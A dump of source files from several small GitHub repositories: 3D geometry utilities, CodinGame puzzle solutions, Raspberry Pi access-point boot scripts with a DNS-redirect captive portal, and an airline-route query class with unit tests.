"max_line_length": 125,
"num_lines": 204,
"path": "/fundamentals/cuboid.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 8, 2016\n\n@author: Panos Achlioptas and Lin Shao\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nimport numpy as np\nimport warnings\nfrom .. utils import linalg_utils as utils\nl2_norm = utils.l2_norm\n\n\nclass Cuboid(object):\n '''\n A class representing a 3D Cuboid.\n '''\n\n def __init__(self, extrema):\n '''\n Constructor.\n Args: extrema (numpy array) containing 6 non-negative integers [xmin, ymin, zmin, xmax, ymax, zmax].\n '''\n self.extrema = extrema\n self.corners = self._corner_points()\n\n def __str__(self):\n return 'Cuboid with [xmin, ymin, zmin, xmax, ymax, zmax] coordinates = %s.' % (str(self.extrema), )\n\n @property\n def extrema(self):\n return self._extrema\n\n @extrema.setter\n def extrema(self, value):\n self._extrema = value\n [xmin, ymin, zmin, xmax, ymax, zmax] = self._extrema\n if xmax == xmin or zmin == zmax or ymax == ymin:\n warnings.warn('Degenerate Cuboid was specified (its volume and/or area are zero).')\n if xmin > xmax or ymin > ymax or zmin > zmax:\n raise ValueError('Check extrema of cuboid.')\n\n def _corner_points(self):\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n c1 = np.array([xmin, ymin, zmin])\n c2 = np.array([xmax, ymin, zmin])\n c3 = np.array([xmax, ymax, zmin])\n c4 = np.array([xmin, ymax, zmin])\n c5 = np.array([xmin, ymin, zmax])\n c6 = np.array([xmax, ymin, zmax])\n c7 = np.array([xmax, ymax, zmax])\n c8 = np.array([xmin, ymax, zmax])\n return np.vstack([c1, c2, c3, c4, c5, c6, c7, c8])\n\n def diagonal_length(self):\n return l2_norm(self.extrema[:3] - self.extrema[3:])\n\n def get_extrema(self):\n ''' Syntactic sugar to get the extrema property into separate variables.\n '''\n e = self.extrema\n return e[0], e[1], e[2], e[3], e[4], e[5]\n\n def volume(self):\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n return (xmax - xmin) * (ymax - ymin) * (zmax - zmin)\n\n def height(self):\n [_, _, zmin, _, _, zmax] = self.extrema\n return zmax - zmin\n\n def intersection_with(self, other):\n [sxmin, symin, szmin, sxmax, symax, szmax] = self.get_extrema()\n [oxmin, oymin, ozmin, oxmax, oymax, ozmax] = other.get_extrema()\n dx = min(sxmax, oxmax) - max(sxmin, oxmin)\n dy = min(symax, oymax) - max(symin, oymin)\n dz = min(szmax, ozmax) - max(szmin, ozmin)\n inter = 0\n\n if (dx > 0) and (dy > 0) and (dz > 0):\n inter = dx * dy * dz\n\n return inter\n\n def barycenter(self):\n n_corners = self.corners.shape[0]\n return np.sum(self.corners, axis=0) / n_corners\n\n def faces(self):\n corners = self.corners\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n xmin_f = corners[corners[:, 0] == xmin, :]\n xmax_f = corners[corners[:, 0] == xmax, :]\n ymin_f = corners[corners[:, 1] == ymin, :]\n ymax_f = corners[corners[:, 1] == ymax, :]\n zmin_f = corners[corners[:, 2] == zmin, :]\n zmax_f = corners[corners[:, 2] == zmax, :]\n return [xmin_f, xmax_f, ymin_f, ymax_f, zmin_f, zmax_f]\n\n def is_point_inside(self, point):\n '''Given a 3D point tests if it lies inside the Cuboid.\n '''\n [xmin, ymin, zmin, xmax, ymax, zmax] = self.extrema\n return np.all([xmin, ymin, zmin] <= point) and np.all([xmax, ymax, zmax] >= point)\n\n def containing_sector(self, sector_center, ignore_z_axis=True):\n '''Computes the tightest (conic) sector that contains the Cuboid. 
The sector's center is defined by the user.\n Input:\n sector_center: 3D Point where the sector begins.\n ignore_z_axis: (Boolean) if True the Cuboid is treated as rectangle by eliminating it's z-dimension.\n Notes: Roughly it computes the angle between the ray's starting at the sector's center and each side of the cuboid.\n The one with the largest angle is the requested sector.\n '''\n if self.is_point_inside(sector_center):\n raise ValueError('Sector\\'s center lies inside the bounding box.')\n\n def angle_of_sector(sector_center, side):\n x1, y1, x2, y2 = side\n line_1 = np.array([x1 - sector_center[0], y1 - sector_center[1]]) # First diagonal pair of points of cuboid\n line_2 = np.array([x2 - sector_center[0], y2 - sector_center[1]])\n cos = line_1.dot(line_2) / (l2_norm(line_1) * l2_norm(line_2))\n if cos >= 1 or cos <= -1:\n angle = 0\n else:\n angle = np.arccos(cos)\n assert(angle <= np.pi and angle >= 0)\n return angle\n\n if ignore_z_axis:\n [xmin, ymin, _, xmax, ymax, _] = self.extrema\n sides = [[xmin, ymin, xmax, ymax],\n [xmax, ymin, xmin, ymax],\n [xmin, ymax, xmax, ymax],\n [xmin, ymin, xmax, ymin],\n [xmin, ymin, xmin, ymax],\n [xmax, ymin, xmax, ymax],\n ]\n\n a0 = angle_of_sector(sector_center, sides[0])\n a1 = angle_of_sector(sector_center, sides[1]) # a0, a1: checking the diagonals.\n a2 = angle_of_sector(sector_center, sides[2])\n a3 = angle_of_sector(sector_center, sides[3])\n a4 = angle_of_sector(sector_center, sides[4])\n a5 = angle_of_sector(sector_center, sides[5])\n largest = np.argmax([a0, a1, a2, a3, a4, a5])\n return np.array(sides[largest][0:2]), np.array(sides[largest][2:])\n\n def union_with(self, other):\n return self.volume() + other.volume() - self.intersection_with(other)\n\n def iou_with(self, other):\n inter = self.intersection_with(other)\n union = self.union_with(other)\n return float(inter) / union\n\n def overlap_ratio_with(self, other, ratio_type='union'):\n '''\n Returns the overlap ratio between two cuboids. That is the ratio of their volume intersection\n and their overlap. If the ratio_type is 'union' then the overlap is the volume of their union. If it is min, it\n the min volume between them.\n '''\n inter = self.intersection_with(other)\n if ratio_type == 'union':\n union = self.union_with(other)\n return float(inter) / union\n elif ratio_type == 'min':\n return float(inter) / min(self.volume(), other.volume())\n else:\n ValueError('ratio_type must be either \\'union\\', or \\'min\\'.')\n\n def plot(self, axis=None, c='r'):\n '''Plot the Cuboid.\n Input:\n axis - (matplotlib.axes.Axes) where the cuboid will be drawn.\n c - (String) specifying the color of the cuboid. 
Must be valid for matplotlib.pylab.plot\n '''\n corners = self.corners\n if axis is not None:\n axis.plot([corners[0, 0], corners[1, 0]], [corners[0, 1], corners[1, 1]], zs=[corners[0, 2], corners[1, 2]], c=c)\n axis.plot([corners[1, 0], corners[2, 0]], [corners[1, 1], corners[2, 1]], zs=[corners[1, 2], corners[2, 2]], c=c)\n axis.plot([corners[2, 0], corners[3, 0]], [corners[2, 1], corners[3, 1]], zs=[corners[2, 2], corners[3, 2]], c=c)\n axis.plot([corners[3, 0], corners[0, 0]], [corners[3, 1], corners[0, 1]], zs=[corners[3, 2], corners[0, 2]], c=c)\n axis.plot([corners[4, 0], corners[5, 0]], [corners[4, 1], corners[5, 1]], zs=[corners[4, 2], corners[5, 2]], c=c)\n axis.plot([corners[5, 0], corners[6, 0]], [corners[5, 1], corners[6, 1]], zs=[corners[5, 2], corners[6, 2]], c=c)\n axis.plot([corners[6, 0], corners[7, 0]], [corners[6, 1], corners[7, 1]], zs=[corners[6, 2], corners[7, 2]], c=c)\n axis.plot([corners[7, 0], corners[4, 0]], [corners[7, 1], corners[0, 1]], zs=[corners[7, 2], corners[4, 2]], c=c)\n axis.plot([corners[0, 0], corners[4, 0]], [corners[0, 1], corners[4, 1]], zs=[corners[0, 2], corners[4, 2]], c=c)\n axis.plot([corners[1, 0], corners[5, 0]], [corners[1, 1], corners[5, 1]], zs=[corners[1, 2], corners[5, 2]], c=c)\n axis.plot([corners[2, 0], corners[6, 0]], [corners[2, 1], corners[6, 1]], zs=[corners[2, 2], corners[6, 2]], c=c)\n axis.plot([corners[3, 0], corners[7, 0]], [corners[3, 1], corners[7, 1]], zs=[corners[3, 2], corners[7, 2]], c=c)\n return axis.figure\n else:\n ValueError('NYI')\n\n @staticmethod\n def bounding_box_of_3d_points(points):\n xmin = np.min(points[:, 0])\n xmax = np.max(points[:, 0])\n ymin = np.min(points[:, 1])\n ymax = np.max(points[:, 1])\n zmin = np.min(points[:, 2])\n zmax = np.max(points[:, 2])\n return Cuboid(np.array([xmin, ymin, zmin, xmax, ymax, zmax]))\n"
},
{
"alpha_fraction": 0.5758196711540222,
"alphanum_fraction": 0.5848360657691956,
"avg_line_length": 31.972972869873047,
"blob_id": "e51d3ad3a12277f1b6e8cc61f2c3017137371e7b",
"content_id": "5911705df168de9f886d535a2fb48bfb955cdded",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2440,
"license_type": "permissive",
"max_line_length": 117,
"num_lines": 74,
"path": "/fundamentals/rectangle.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on December 13, 2016\n\n@author: Panos Achlioptas and Lin Shao\n@contact: pachlioptas @ gmail.com\n@copyright: You are free to use, change, or redistribute this code in any way you want for non-commercial purposes.\n'''\n\nfrom .. utils import linalg_utils as utils\nl2_norm = utils.l2_norm\n\n\nclass Rectangle(object):\n '''\n A class representing a 2D rectangle.\n '''\n\n def __init__(self, corners):\n '''\n Constructor.\n corners is a numpy array containing 4 non-negative integers\n describing the [xmin, ymin, xmax, ymax] coordinates of the corners of the\n rectangle.\n '''\n self.corners = corners\n\n def get_corners(self):\n ''' Syntactic sugar to get the corners property into separate variables.\n '''\n c = self.corners\n return c[0], c[1], c[2], c[3]\n\n def area(self):\n c = self.corners\n return (c[2] - c[0]) * (c[3] - c[1])\n\n def intersection_with(self, other):\n [sxmin, symin, sxmax, symax] = self.get_corners()\n [oxmin, oymin, oxmax, oymax] = other.get_corners()\n dx = min(sxmax, oxmax) - max(sxmin, oxmin)\n dy = min(symax, oymax) - max(symin, oymin)\n inter = 0\n if (dx > 0) and (dy > 0):\n inter = dx * dy\n return inter\n\n def diagonal_length(self):\n ''' Returns the length of the diagonal of a rectangle.\n '''\n [xmin, ymin, xmax, ymax] = self.get_corners()\n return l2_norm([xmin - xmax, ymin - ymax])\n\n def union_with(self, other):\n return self.area() + other.area() - self.intersection_with(other)\n\n def iou_with(self, other):\n inter = self.intersection_with(other)\n union = self.union_with(other)\n return float(inter) / union\n\n def overlap_ratio_with(self, other, ratio_type='union'):\n '''\n Returns the overlap ratio between two rectangles. That is the ratio of their area intersection\n and their overlap. If the ratio_type is 'union' then the overlap is the area of their union. If it is min, it\n the min area between them.\n '''\n inter = self.intersection_with(other)\n if ratio_type == 'union':\n union = self.union_with(other)\n return float(inter) / union\n elif ratio_type == 'min':\n return float(inter) / min(self.area(), other.area())\n else:\n ValueError('ratio_type must be either \\'union\\', or \\'min\\'.')\n"
},
{
"alpha_fraction": 0.5670307874679565,
"alphanum_fraction": 0.6007944345474243,
"avg_line_length": 26.216217041015625,
"blob_id": "4e7f8a885a9de248f024c64c7d569f56b1072392",
"content_id": "3706d816129fad4fd550f900b9d690f6873ac203",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1007,
"license_type": "permissive",
"max_line_length": 67,
"num_lines": 37,
"path": "/point_clouds/normalizations.py",
"repo_name": "optas/geo_tool",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 30, 2018\n\n@author: optas\n'''\n\nimport numpy as np\nfrom . point_cloud import Point_Cloud\n\n\ndef zero_mean_in_unit_sphere(in_pclouds):\n ''' Zero MEAN + Max_dist = 0.5\n '''\n pclouds = in_pclouds.copy()\n pclouds = pclouds - np.expand_dims(np.mean(pclouds, axis=1), 1)\n dist = np.max(np.sqrt(np.sum(pclouds ** 2, axis=2)), 1)\n dist = np.expand_dims(np.expand_dims(dist, 1), 2)\n pclouds = pclouds / (dist * 2.0)\n return pclouds\n\n\ndef center_in_unit_sphere(pclouds):\n for i, pc in enumerate(pclouds):\n pc, _ = Point_Cloud(pc).center_axis()\n pclouds[i] = pc.points\n\n dist = np.max(np.sqrt(np.sum(pclouds ** 2, axis=2)), 1)\n dist = np.expand_dims(np.expand_dims(dist, 1), 2)\n pclouds = pclouds / (dist * 2.0)\n\n for i, pc in enumerate(pclouds):\n pc, _ = Point_Cloud(pc).center_axis()\n pclouds[i] = pc.points\n\n dist = np.max(np.sqrt(np.sum(pclouds ** 2, axis=2)), 1)\n assert(np.all(abs(dist - 0.5) < 0.0001))\n return pclouds\n"
}
] | 31 |
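The union_with/iou_with methods in the geo_tool records above both rest on the inclusion-exclusion identity |A ∪ B| = |A| + |B| - |A ∩ B|. A minimal self-contained check of that identity for 2D boxes, using plain tuples instead of the repo's Rectangle class (the values are invented):

    # Axis-aligned boxes as (xmin, ymin, xmax, ymax); toy values.
    a = (0, 0, 4, 4)
    b = (2, 2, 6, 6)

    def area(r):
        return (r[2] - r[0]) * (r[3] - r[1])

    def intersection(a, b):
        dx = min(a[2], b[2]) - max(a[0], b[0])
        dy = min(a[3], b[3]) - max(a[1], b[1])
        return dx * dy if dx > 0 and dy > 0 else 0

    inter = intersection(a, b)           # 2 * 2 = 4
    union = area(a) + area(b) - inter    # 16 + 16 - 4 = 28
    print(float(inter) / union)          # IoU = 4/28 ~= 0.143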
folkol/codinggame
|
https://github.com/folkol/codinggame
|
b981721af508f32bf8d238e19cf04f15c7a9ba51
|
e68cbf54be9ef997a44a22f1f6a7a8894d593b02
|
e618115a5e852d089afaeaafcf8daa820938d68a
|
refs/heads/master
| 2020-04-17T07:01:17.489420 | 2016-05-10T21:51:08 | 2016-05-10T21:51:08 | 66,836,137 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4754420518875122,
"alphanum_fraction": 0.5068762302398682,
"avg_line_length": 24.399999618530273,
"blob_id": "54bdf002321292c74176c1220078931090a83558",
"content_id": "ab5a8ea380be32b4051a9b3bbd9db4199f8fa8f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 509,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 20,
"path": "/thor.py",
"repo_name": "folkol/codinggame",
"src_encoding": "UTF-8",
"text": "\ndirections = {\n (-1, -1): 'NW',\n (0, -1): 'N',\n (1, -1): 'NE',\n (1, 0): 'E',\n (1, 1): 'SE',\n (0, 1): 'S',\n (-1, 1): 'SW',\n (-1, 0): 'W'\n}\n\nlight_x, light_y, thor_x, thor_y = [int(i) for i in raw_input().split()]\n\nwhile True:\n remaining_turns = int(raw_input()) # The remaining amount of turns Thor can move. Do not remove this line.\n\n from numpy import sign\n dx, dy = sign(light_x - thor_x), sign(light_y - thor_y)\n print directions[(dx, dy)]\n thor_x, thor_y = dx, dy\n"
},
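The direction table in thor.py maps the pair (sign(dx), sign(dy)) straight to a compass heading, with y growing southward as on the CodinGame grid. A quick self-contained check (Python 3 here, with a local sign helper standing in for the script's numpy import; the coordinates are invented):

    directions = {(-1, -1): 'NW', (0, -1): 'N', (1, -1): 'NE', (1, 0): 'E',
                  (1, 1): 'SE', (0, 1): 'S', (-1, 1): 'SW', (-1, 0): 'W'}

    def sign(x):
        return (x > 0) - (x < 0)  # avoids the numpy dependency

    # Light at (10, 2), Thor at (3, 7): he must move east and up-screen.
    dx, dy = sign(10 - 3), sign(2 - 7)
    print(directions[(dx, dy)])  # NE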
{
"alpha_fraction": 0.4369286894798279,
"alphanum_fraction": 0.44606947898864746,
"avg_line_length": 35.46666717529297,
"blob_id": "4957d73109328d1c2b84445d72b350ab74f6581d",
"content_id": "ffc528231d4a659d8ce22b7e38942e090bfd1f4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 547,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 15,
"path": "/glass_stacking.py",
"repo_name": "folkol/codinggame",
"src_encoding": "UTF-8",
"text": "def draw_stack(glasses_left, n=1, m=0):\n def draw(glasses, padding):\n print ' ' * padding + ' '.join([' *** '] * glasses) + ' ' * padding\n print ' ' * padding + ' '.join([' * * '] * glasses) + ' ' * padding\n print ' ' * padding + ' '.join([' * * '] * glasses) + ' ' * padding\n print ' ' * padding + ' '.join(['*****'] * glasses) + ' ' * padding\n\n if glasses_left >= n:\n m = draw_stack(glasses_left - n, n + 1, m)\n draw(m, n - 1)\n return m + 1\n\n\nN = int(raw_input())\ndraw_stack(N)\n"
}
] | 2 |
EduMake/rpi-ap
|
https://github.com/EduMake/rpi-ap
|
4389879c5dc6d5001b50b4df05226dbf9885819d
|
874c001184c4d8b4aedacc77a2a899bd2530692b
|
f63b5b4b1a8489c7bf146ac8038a297b21097b34
|
refs/heads/master
| 2021-01-10T17:11:43.637323 | 2015-12-05T10:46:00 | 2015-12-05T10:46:00 | 47,433,828 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7344674468040466,
"alphanum_fraction": 0.7588757276535034,
"avg_line_length": 49.03703689575195,
"blob_id": "d70d4919c06d1452fdf8bcb5f0963beb2f21dbc6",
"content_id": "fccb35bd52d15293bb88af193d01a3b95b2efab9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1352,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 27,
"path": "/README.md",
"repo_name": "EduMake/rpi-ap",
"src_encoding": "UTF-8",
"text": "# rpi-ap\nRPi config for using rpi as an access point which uses capture portal techniques to give mobiles a web ui to physical computing projects. As setup it does not give internet access \n\n## Install the software\n\n```\nsudo aptitude install iw hostapd dnsmasq python-serial\n```\n\n* copy the files from the /file into the same position on the Pi (FIXME)\n* Use wpa_cli to add the networks you want (use 'save config' to store it)\n* In /etc/hostapd/hostapd.conf set ssid=EduMakeRPi to whatever you want to call your network\n* Set the SSIDs you would like it to try to connect to first in /etc/rc.local\n* It will scan for the network names in ssids= () and attach to one those if it can\n* If not it will setup an Access Point using 10.5.5.1 for the RPi and 10.5.5.100 -150 for the dhcp range\n\n* To set up a way physically force own AP (so you can force that behaviour even when at home base):-\n*\tWire GPIO 14 and 15 together \n*\tuse raspi-config -> Serial to Disable shell and kernel messages on the serial connection.\n* the code will check if the GPIO 14 and 15 are linked together (with a jumper / wire) and skip the searching if they are\n\n\n##Techniques based on\n\nhttp://www.penguintutor.com/news/raspberrypi/wireless-hotspot\n\nhttps://nims11.wordpress.com/2012/04/27/hostapd-the-linux-way-to-create-virtual-wifi-access-point/ using the dnsmasq version\n\n"
},
{
"alpha_fraction": 0.6892655491828918,
"alphanum_fraction": 0.709039568901062,
"avg_line_length": 27.280000686645508,
"blob_id": "3f7a2bbf51488ffa4e92d432069ea903c90ef87f",
"content_id": "23be347efce5df15ebbb2d41eb29ae64f27d5063",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 708,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 25,
"path": "/files/etc/serialtest.py",
"repo_name": "EduMake/rpi-ap",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\nimport serial\nimport io\nimport sys\n\n#https://pyserial.readthedocs.org/en/latest/index.html\n\ntry:\n\tprint(\"Checking if GPIO 14 & 15 are connected\")\n\t#ser = serial.serial_for_url('loop://', timeout=1) #Tester\n\t\n\t#Standard UART on RPi: need to use raspi-config to disable bootup logging on SERIAL \n\tser = serial.serial_for_url('/dev/ttyAMA0', timeout=1) \n\tser.write(\"hello\\n\")\n\tser.flush() # it is buffering. required to get the data out *now*\n\thello = ser.readline()\n\tif(hello == \"hello\\n\"):\n\t\tprint(\"GPIO 14 & 15 are connected\")\n\t\tsys.exit(0)\n\telse:\n\t\tprint(\"Expected Message Not Received\")\n\t\tsys.exit(1)\nexcept serial.SerialException:\n\tprint(\"Serial Communication Failed\")\n\tsys.exit(1)\n\n"
},
{
"alpha_fraction": 0.6253955960273743,
"alphanum_fraction": 0.6534810066223145,
"avg_line_length": 30.600000381469727,
"blob_id": "6024ed32152c6ea0368e2c91fdf86313b03a60be",
"content_id": "2c9bac24b5afd85941ff95778dd316a305bc0290",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2528,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 80,
"path": "/files/etc/rc.local",
"repo_name": "EduMake/rpi-ap",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n#\n# rc.local\n#\n\n# EduMake RPi Network Conf Bootstrapper\n# Will scan for the network names (ssids= () below) and attach to one those if it can\n# Will not be able to attach until those SSIDs are set up using wpa_cli (remember to save config)\n# If can't attach to WiFi it will generate its own AP using the SSID etc in /etc/hostapd/hostapd.conf\n# and the IP addressing etc in createNetwork() below\n# To set up a way physically force own AP (so you can force that behaviour even when at home base):-\n#\tWire GPIO 14 and 15 together \n#\tuse raspi-config -> Serial to Disable shell and kernel messages on the serial connection.\n# the code will check if the GPIO 14 and 15 are linked together (with a jumper / wire) and skip the searching if they are\n\nssids=( 'WiFi1' 'SSID2' )\n\ncreateNetwork(){\n echo \"Creating network using Own AP\"\n #Stop the vanilla dnsmasq that does nowt\n service dnsmasq stop\n #Turn WiFi dongle wlan0 off\n ifconfig wlan0 down\n\n\t#Turn WiFi dongle wlan0 back on a Fixed IP\n ifconfig wlan0 10.5.5.1 netmask 255.255.255.0 up\n \n #Turn on the Soft Access Point\n hostapd -B /etc/hostapd/hostapd.conf\n \n #Turn on DHCP and DNS redirecting : so all DNS based (web) traffic comes to the RPi\n sudo dnsmasq --interface=wlan0 --dhcp-range=10.5.5.100,10.5.5.150,255.255.255.0,12h --address=/#/10.5.5.1\n echo \"Network created\"\n}\n\necho \"=========================================\"\necho \"EduMake RPi Network Conf Bootstrapper 0.1\"\necho \"=========================================\"\n \nif /etc/serialtest.py ; then\n echo \"Jumper found - forcing Own AP\"\n ssids=( )\nelse\n echo \"Scanning for known WiFi networks\"\nfi\n\nconnected=false\nfor ssid in \"${ssids[@]}\"\ndo\n if iwlist wlan0 scan | grep $ssid > /dev/null\n then\n echo \"First WiFi in range has SSID:\" $ssid\n echo \"Starting supplicant for WPA/WPA2\"\n wpa_supplicant -B -i wlan0 -c /etc/wpa_supplicant/wpa_supplicant.conf > /dev/null 2>&1\n echo \"Obtaining IP from DHCP\"\n if dhclient -1 wlan0\n then\n echo \"Connected to WiFi\"\n connected=true\n break\n else\n echo \"DHCP server did not respond with an IP lease (DHCPOFFER)\"\n wpa_cli terminate\n break\n fi\n else\n echo \"Not in range, WiFi with SSID:\" $ssid\n fi\ndone\n \nif ! $connected; then\n createNetwork\nfi\n\n#Launch Web Server\n#For discover-ability make sure the the server responds to /success.txt with a start page\n\n#sudo /path/to/server &\n\nexit 0\n"
}
] | 3 |
weishi3/Airline_Query_Python
|
https://github.com/weishi3/Airline_Query_Python
|
3d7b228a8af5c23e3dbb24f7378cdde52907e481
|
b75fe88dde212d819d290da12ba81da4cb12c6f3
|
6d5125e42e73d7180809c99f319d727ec119007e
|
refs/heads/master
| 2021-01-11T00:09:27.199574 | 2016-10-12T22:23:28 | 2016-10-12T22:23:28 | 70,746,582 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5603756904602051,
"alphanum_fraction": 0.5629099607467651,
"avg_line_length": 27.299577713012695,
"blob_id": "8929b811f92904b93d7b200619bb49fe1e6d80a2",
"content_id": "60880a1429ccb94f149186df61ee9b6c60ce1490",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6708,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 237,
"path": "/CS242assignment2.1/implements/Query.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\n\nclass Query:\n\n\n\n\n def __init__(self, city_list, searchForCode):\n self.city_list = city_list\n self.searchForCode = searchForCode\n\n \"\"\"\n return all cities names for query\n \"\"\"\n\n #all city name:part 1\n def get_all_city(self):\n all_city = []\n for i in self.city_list:\n city = self.city_list[i]\n all_city.append(city.name)\n\n return all_city\n\n #basic queries:part2\n \"\"\"\n given the name of a city, get the city code\n \"\"\"\n def get_city_code(self, city_name):\n return self.searchForCode[city_name]\n\n\n \"\"\"\n return the country the given city_name belongs to\n \"\"\"\n def get_country(self, city_name):\n return self.city_list[self.searchForCode[city_name]].country\n\n \"\"\"\n return the continent the given city_name belongs to\n \"\"\"\n def get_continent(self, city_name):\n return self.city_list[self.searchForCode[city_name]].continent\n \"\"\"\n return the timezone the given city_name belongs to\n \"\"\"\n def get_timezone(self, city_name):\n return self.city_list[self.searchForCode[city_name]].timezone\n \"\"\"\n return the coordinate the given city_name belongs to\n \"\"\"\n def get_coordinates(self, city_name):\n return self.city_list[self.searchForCode[city_name]].coordinates\n \"\"\"\n return the population of the city with given city_name\n \"\"\"\n def get_population(self, city_name):\n return self.city_list[self.searchForCode[city_name]].population\n \"\"\"\n return the region of the city with given city_name\n \"\"\"\n def get_region(self, city_name):\n return self.city_list[self.searchForCode[city_name]].region\n\n\n \"\"\"\n return the deep copy of accessibleList of a city\n \"\"\"\n def get_accessible_list(self, city):\n accessible_list = city.accessibleList\n accessible_list_copy = []\n for i in accessible_list.keys():\n accessible_list_copy.append((self.city_list[i].name,accessible_list[i]))\n\n return accessible_list_copy\n\n \"\"\"\n return the tuple[from, to ,distance] of the longest flight\n \"\"\"\n def get_longest_flight(self):\n max_distance = 0\n the_flight = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n for code in city.accessibleList.keys():\n if city.accessibleList[code] > max_distance:\n max_distance = city.accessibleList[code]\n the_flight = [city.name, self.city_list[code].name, max_distance]\n\n return the_flight\n\n\n \"\"\"\n return the tuple[from, to ,distance] of the shortest flight\n \"\"\"\n def get_shortest_flight(self):\n min_distance = -1\n the_flight = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n for code in city.accessibleList:\n\n if min_distance == -1:\n min_distance = city.accessibleList[code]\n the_flight = [city.name, self.city_list[code].name, min_distance]\n elif city.accessibleList[code] < min_distance:\n min_distance = city.accessibleList[code]\n the_flight = [city.name, self.city_list[code].name, min_distance]\n\n return the_flight\n\n\n \"\"\"\n return the average distance of all flights\n \"\"\"\n def get_average_distance(self):\n whole = 0\n count = 0\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n for code in city.accessibleList.keys():\n whole += city.accessibleList[code]\n count += 1\n\n return whole / count\n\n \"\"\"\n return [city.name, population] of the largest city\n \"\"\"\n def get_biggest_city(self):\n population = 0\n 
biggest_city = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n\n if city.population > population:\n population = city.population\n biggest_city = [city.name, population]\n\n return biggest_city\n\n\n \"\"\"\n return [city.name, population] of the smallest city\n \"\"\"\n def get_smallest_city(self):\n population = -1\n smallest_city = []\n\n # search through each city and outgoing routes for the longest\n for i in self.city_list:\n city = self.city_list[i]\n if population == -1 or city.population < population:\n population = city.population\n smallest_city = [city.name, population]\n\n return smallest_city\n\n \"\"\"\n return the average population of all cities\n \"\"\"\n def get_average_size(self):\n whole = 0\n count = 0\n\n for i in self.city_list:\n city = self.city_list[i]\n whole += city.population\n count += 1\n\n return whole / count\n\n \"\"\"\n return a list of continents and the cities belonging to them\n \"\"\"\n def get_continent_list(self):\n continent_list = {}\n\n for i in self.city_list:\n city = self.city_list[i]\n if( not (city.continent in continent_list)):\n continent_list[city.continent] = [city.name]\n else:\n continent_list[city.continent].append(city.name)\n\n return continent_list\n \"\"\"\n The old version:\n def get_hub_city(self):\n city_list = []\n temp = 0\n for i in self.city_list:\n print(i)\n city = self.city_list[i]\n if len(city.accessibleList) > temp:\n city_list = [city.name]\n temp = len(city.accessibleList)\n elif len(city.accessibleList) == temp:\n city_list.append(city.name)\n\n return city_list\n\n \"\"\"\n\n\n \"\"\"\n return the cities with most connections\n \"\"\"\n def get_hub_city(self):\n city_list = []\n temp = {}\n for i in self.city_list:\n city = self.city_list[i]\n temp[city.name] = len(city.accessibleList)\n for i in self.city_list:\n for j in self.city_list[i].accessibleList:\n city = self.city_list[j]\n temp[city.name] += 1\n max_link = 0\n for i in temp:\n if temp[i] > max_link:\n city_list = [i]\n max_link = temp[i]\n elif temp[i] == max_link:\n city_list.append(i)\n return city_list\n\n"
},
{
"alpha_fraction": 0.6101058125495911,
"alphanum_fraction": 0.641515851020813,
"avg_line_length": 39.68055725097656,
"blob_id": "f693ce8474a463a9054127ed1d096b7b118ace64",
"content_id": "8d4aac018a1860249d3f6b05359be1116e662482",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2929,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 72,
"path": "/CS242assignment2.1/tests/testForWAR3City.py",
"repo_name": "weishi3/Airline_Query_Python",
"src_encoding": "UTF-8",
"text": "__author__ = 'shiwei'\n\nimport unittest\n\nfrom implements import MyParser,Query,Edit\n\n\n\n\n# I build some virtual cities to test:\nclass MyTestCase(unittest.TestCase):\n\n def test_WAR3(self):\n #test parsers\n ui_parser = MyParser.MyParser(\"warcraft3_city.txt\")\n ui_parser.parse(\"init\")\n the_query = Query.Query(ui_parser.code_indexed_cityList, ui_parser.searchForCode)\n\n #note: i is the city name here\n for i in the_query.get_all_city():\n #test query helper function\n if the_query.get_city_code(i) == \"CAPH\":\n #test basic queries\n self.assertEqual(the_query.get_country(i), \"Human\")\n self.assertEqual(the_query.get_continent(i), \"Lordaeron\")\n self.assertEqual(the_query.get_timezone(i), -3)\n self.assertEqual(the_query.get_population(i), 60000000000)\n self.assertEqual(the_query.get_region(i), 1)\n j=the_query.get_accessible_list(ui_parser.code_indexed_cityList[ui_parser.searchForCode[i]])\n print j\n\n self.assertEqual(ui_parser.code_indexed_cityList[\"CAPU\"].name, \"UnderCity\")\n\n else:\n 